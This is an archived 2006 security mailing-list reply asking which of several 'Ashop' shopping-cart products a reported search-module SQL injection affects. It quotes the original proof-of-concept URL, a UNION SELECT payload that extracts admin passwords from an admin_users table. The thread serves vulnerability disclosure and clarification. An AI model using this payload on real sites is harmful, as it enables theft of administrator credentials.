[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Ashop Search Module SQL injection
- To: entrika_fs@xxxxxxxxx
- Subject: Re: Ashop Search Module SQL injection
- From: security curmudgeon <jericho@xxxxxxxxxxxxx>
- Date: Tue, 25 Jul 2006 18:35:13 -0400 (EDT)
On Tue, 13 Jun 2006, entrika_fs@xxxxxxxxx wrote:
:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Shopping Cart Software
www.ashop.com.au/
ASHOP
www.ashop.com.hk/
Ashop
www.ashop.co.il/
Ashop
www.ashop.at/
ashop.co.uk
www.ashop.co.uk/
[..]
Something else?